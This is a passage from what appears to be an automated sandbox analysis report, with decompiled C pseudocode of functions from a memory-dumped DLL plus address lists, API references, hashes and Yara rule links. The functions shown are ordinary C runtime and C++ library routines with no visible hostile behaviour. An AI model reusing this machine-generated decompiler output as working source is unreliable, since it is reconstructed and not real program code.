													_t261[1] = 0 | _t202 == 0x00000000;
												}
												_t103 = _t249 + 8; // 0x8b018b
												 *_t261 =  *_t103;
											}
											 *(_t249 + 0x18) = _t261[1];
											goto L39;
										}
										__eflags = _t247;
										if(_t247 != 0) {
											 *_t261 =  *(_t261 + _t247 * 8);
											_t261[1] =  *(_t261 + 4 + _t247 * 8);
											 *(_t261 + _t247 * 8) = _v720;
											 *(_t261 + 4 + _t247 * 8) = _v708;
										}
										goto L28;
									}
									L39:
									_t176 = _t210 * 0xc;
									_t110 = _t176 + 0x6d4f0de8; // 0x6d48815c
									 *0x6d4ea26c(_t249);
									_t178 =  *((intOrPtr*)( *_t110))();
									_t233 = _v724;
									__eflags = _t178;
									if(_t178 == 0) {
										__eflags = _t233 - 0x6d5452b0;
										if(_t233 != 0x6d5452b0) {
											_t260 = _t210 + _t210;
											__eflags = _t260;
											asm("lock xadd [eax], ecx");
											if(_t260 != 0) {
												goto L44;
											} else {
												_t128 = _t260 * 8; // 0x10468b00
												E6D4CCBD3( *((intOrPtr*)(_t249 + _t128 + 0x28)));
												_t131 = _t260 * 8; // 0x3b8e8
												E6D4CCBD3( *((intOrPtr*)(_t249 + _t131 + 0x24)));
												_t134 = _t210 * 4; // 0xe764e850
												E6D4CCBD3( *((intOrPtr*)(_t249 + _t134 + 0xa0)));
												_t236 = _v704;
												 *((intOrPtr*)(_v716 + _t249)) = _t236;
												 *(_t249 + 0xa0 + _t210 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t249 + 0x28 + (_t210 + _t210) * 8)) = _t234;
									} else {
										 *(_v716 + _t249) = _t233;
										_t115 = _t210 * 4; // 0xe764e850
										E6D4CCBD3( *((intOrPtr*)(_t249 + _t115 + 0xa0)));
										 *(_t249 + 0xa0 + _t210 * 4) = _v736;
										E6D4CCBD3(_v732);
										 *(_t249 + 8) = _v740;
										goto L2;
									}
									goto L3;
								}
							}
						} else {
							goto L3;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t160 = _t159 | 0x00000001;
					__eflags = _t160;
					goto L11;
				} else {
					L2:
					L3:
					_pop(_t257);
					return E6D49F8A5(_v8 ^ _t265, _t247, _t257);
				}
				L47:
			}

0x6d4ce987
0x6d4ce98f
0x6d4ce996
0x6d4ce999
0x6d4ce99a
0x6d4ce99d
0x6d4ce9a1
0x6d4ce9a2
0x6d4ce9a5
0x6d4ce9b5
0x6d4ce9d8
0x6d4ce9dd
0x6d4ce9e2
0x6d4ce9f7
0x6d4ce9fa
0x6d4ce9fa
0x6d4ce9fd
0x6d4cea03
0x6d4cea09
0x6d4cea0c
0x6d4cea0e
0x6d4cea11
0x6d4cea18
0x6d4cea1b
0x6d4cea21
0x00000000
0x00000000
0x6d4cea23
0x6d4cea27
0x6d4cea50
0x6d4cea50
0x6d4cea29
0x6d4cea29
0x6d4cea2d
0x6d4cea31
0x6d4cea38
0x6d4cea3e
0x00000000
0x6d4cea40
0x6d4cea40
0x6d4cea43
0x6d4cea46
0x6d4cea4e
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4cea4e
0x6d4cea3e
0x6d4cea5d
0x6d4cea5d
0x6d4cea5f
0x6d4cea65
0x6d4cea6b
0x6d4cea6e
0x6d4cea6e
0x6d4cea71
0x6d4cea74
0x6d4cea74
0x6d4cea84
0x6d4cea92
0x6d4cea97
0x6d4cea9e
0x6d4ceaa0
0x00000000
0x6d4ceaa6
0x6d4ceaac
0x6d4ceab2
0x6d4ceab9
0x6d4ceabf
0x6d4ceac2
0x6d4ceac8
0x6d4cead5
0x6d4ceadc
0x6d4ceae1
0x6d4ceae4
0x6d4ceae6
0x6d4ced3f
0x6d4ced45
0x6d4ced46
0x6d4ced47
0x6d4ced48
0x6d4ced49
0x6d4ced4a
0x6d4ced4f
0x6d4ced50
0x6d4ced5b
0x6d4ced63
0x6d4ced69
0x6d4ced6c
0x6d4ced71
0x6d4ceaec
0x6d4ceaec
0x6d4ceafa
0x6d4ceafd
0x6d4ceb18
0x6d4ceb1f
0x6d4ceb25
0x6d4ceb2b
0x6d4ceaff
0x6d4ceaff
0x6d4ceb07
0x00000000
0x6d4ceb09
0x6d4ceb09
0x6d4ceb0f
0x6d4ceb0f
0x6d4ceb07
0x6d4ceb32
0x6d4ceb35
0x6d4cec52
0x6d4cec55
0x6d4cec62
0x6d4cec65
0x6d4cec6d
0x6d4cec6d
0x6d4cec57
0x6d4cec5d
0x6d4cec5d
0x6d4ceb3b
0x6d4ceb3b
0x6d4ceb41
0x6d4ceb49
0x6d4ceb4b
0x6d4ceb4e
0x6d4ceb57
0x6d4ceb60
0x6d4ceb66
0x6d4ceb66
0x6d4ceb69
0x6d4ceb6b
0x00000000
0x00000000
0x6d4ceb6d
0x6d4ceb73
0x6d4ceb74
0x6d4ceb7f
0x6d4ceb87
0x6d4ceb8f
0x6d4ceb92
0x6d4ceb95
0x6d4ceb9b
0x6d4ceba1
0x6d4ceba7
0x6d4cebad
0x6d4cebb0
0x00000000
0x00000000
0x6d4cebb2
0x6d4cebd7
0x6d4cebd7
0x6d4cebda
0x6d4cebde
0x6d4cebf7
0x6d4cebfc
0x6d4cebff
0x6d4cec01
0x6d4cec07
0x6d4cec42
0x6d4cec09
0x6d4cec09
0x6d4cec0e
0x6d4cec16
0x6d4cec17
0x6d4cec17
0x6d4cec2e
0x6d4cec35
0x6d4cec38
0x6d4cec3d
0x6d4cec3d
0x6d4cec45
0x6d4cec48
0x6d4cec48
0x6d4cec4d
0x00000000
0x6d4cec4d
0x6d4cebb4
0x6d4cebb6
0x6d4cebbb
0x6d4cebc1
0x6d4cebca
0x6d4cebd3
0x6d4cebd3
0x00000000
0x6d4cebb6
0x6d4cec70
0x6d4cec70
0x6d4cec74
0x6d4cec7c
0x6d4cec82
0x6d4cec85
0x6d4cec8b
0x6d4cec8d
0x6d4ceccd
0x6d4cecd3
0x6d4cecda
0x6d4cecda
0x6d4cece0
0x6d4cece4
0x00000000
0x6d4cece6
0x6d4cece6
0x6d4cecea
0x6d4cecef
0x6d4cecf3
0x6d4cecf8
0x6d4cecff
0x6d4ced0d
0x6d4ced13
0x6d4ced16
0x6d4ced16
0x6d4cece4
0x6d4ced25
0x6d4ced2d
0x6d4ced36
0x6d4cec8f
0x6d4cec95
0x6d4cec98
0x6d4cec9f
0x6d4cecb1
0x6d4cecb8
0x6d4cecc5
0x00000000
0x6d4cecc5
0x00000000
0x6d4cec8d
0x6d4ceae6
0x6d4cea61
0x00000000
0x6d4cea61
0x00000000
0x6d4cea5f
0x6d4cea58
0x6d4cea5a
0x6d4cea5a
0x00000000
0x6d4ce9e4
0x6d4ce9e4
0x6d4ce9e6
0x6d4ce9ea
0x6d4ce9f6
0x6d4ce9f6
0x00000000

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

_memcmp.LIBVCRUNTIME ref: 6D4CEC2E
_free.LIBCMT ref: 6D4CEC9F
_free.LIBCMT ref: 6D4CECB8
_free.LIBCMT ref: 6D4CECEA
_free.LIBCMT ref: 6D4CECF3
_free.LIBCMT ref: 6D4CECFF

Strings

C, xrefs: 6D4CEAEC

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 05b9aae9a4a6c1d9f230cd78d7fca407de1e0657bb496b13c2d8d31c0a174abc
Instruction ID: 1a3c7bc8f05b3a5f00a771042c70e21693b23577d1aa0770e0331c49117a068b
Opcode Fuzzy Hash: 05b9aae9a4a6c1d9f230cd78d7fca407de1e0657bb496b13c2d8d31c0a174abc
Instruction Fuzzy Hash: 05C14A79A0521A9FDB24CF18C885FADB7B4FF49304F1085AAD949A7354E731AE90CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6D48FC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6D48FC89(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t66 - 0x14, 0);
				_t63 =  *0x6d546dd0; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6D46161C(0x6d546d60);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6D46171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6D4866BA(_t66 - 0x14);
					return E6D4A0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6D49162A(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6D461438(_t55);
							E6D4A3D74(_t66 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6d4ec0c4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6D49542F(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6D4A0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6D486FD3(__eflags, _t61);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6d546dd0 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

0x6d48fc89
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcba
0x6d48fcbf
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7

APIs

__EH_prolog3.LIBCMT ref: 6D48FC90
std::_Lockit::_Lockit.LIBCPMT ref: 6D48FC9A
int.LIBCPMT ref: 6D48FCB1

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48FCEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48FD0B
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48FD29

Strings

`mTm, xrefs: 6D48FCA5

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: `mTm
API String ID: 651022567-3082417625
Opcode ID: 9f27e8fce20a31ea323c1ea4c323588a862aadebb7e32bca45650c6021f66500
Instruction ID: 0894832fcf3229bd0a8ff7a66b689c557a890863b6d7fa86e5973079b594b630
Opcode Fuzzy Hash: 9f27e8fce20a31ea323c1ea4c323588a862aadebb7e32bca45650c6021f66500
Instruction Fuzzy Hash: 4F11A0758082699BCF05EBA4D840EEDB7B5BF94314F2A440DD612BB391DB74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48F8A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t330 - 0x14, 0);
				_t315 =  *0x6d546db0; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6D46161C(0x6d546d64);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6D4866BA(_t330 - 0x14);
					return E6D4A0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6D4913A1(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t330 - 0x20);
							E6D4A3D74(_t330 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t307, _t315, 0x14);
							E6D486653(_t330 - 0x14, 0);
							_t316 =  *0x6d546ddc; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6D46161C(0x6d546d88);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6D4866BA(_t330 - 0x14);
								return E6D4A0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6D491409(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t330 - 0x20);
										E6D4A3D74(_t330 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t234, _t308, _t316, 0x14);
										E6D486653(_t330 - 0x14, 0);
										_t317 =  *0x6d546de0; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6D46161C(0x6d546d8c);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6D4866BA(_t330 - 0x14);
											return E6D4A0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6D491471(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t330 - 0x20);
													E6D4A3D74(_t330 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t234, _t309, _t317, 0x14);
													E6D486653(_t330 - 0x14, 0);
													_t318 =  *0x6d546dfc; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6D46161C(0x6d546da8);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6D4866BA(_t330 - 0x14);
														return E6D4A0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6D4914EC(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t330 - 0x20);
																E6D4A3D74(_t330 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t234, _t310, _t318, 0x14);
																E6D486653(_t330 - 0x14, 0);
																_t319 =  *0x6d546dcc; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6D46161C(0x6d546d80);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6D4866BA(_t330 - 0x14);
																	return E6D4A0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6D491558(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t330 - 0x20);
																			E6D4A3D74(_t330 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t234, _t311, _t319, 0x14);
																			E6D486653(_t330 - 0x14, 0);
																			_t320 =  *0x6d546e00; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6D46161C(0x6d546dac);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6D4866BA(_t330 - 0x14);
																				return E6D4A0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6D4915C4(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t330 - 0x20);
																						E6D4A3D74(_t330 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t234, _t312, _t320, 0x14);
																						E6D486653(_t330 - 0x14, 0);
																						_t321 =  *0x6d546dd0; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6D46161C(0x6d546d60);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6D4866BA(_t330 - 0x14);
																							return E6D4A0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6D49162A(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6D461438(_t283);
																									E6D4A3D74(_t330 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6d4ec0c4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6D49542F(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6D4A0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6D486FD3(__eflags, _t313);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6d546dd0 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6D486FD3(__eflags, _t312);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6d546e00 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6D486FD3(__eflags, _t311);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6d546dcc = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6D486FD3(__eflags, _t310);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6d546dfc = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6D486FD3(__eflags, _t309);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6d546de0 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6D486FD3(__eflags, _t308);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6d546ddc = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6D486FD3(__eflags, _t307);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6d546db0 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

0x6d48f8a5
0x6d48f8a5
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8d6
0x6d48f8db
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3

APIs

__EH_prolog3.LIBCMT ref: 6D48F8AC
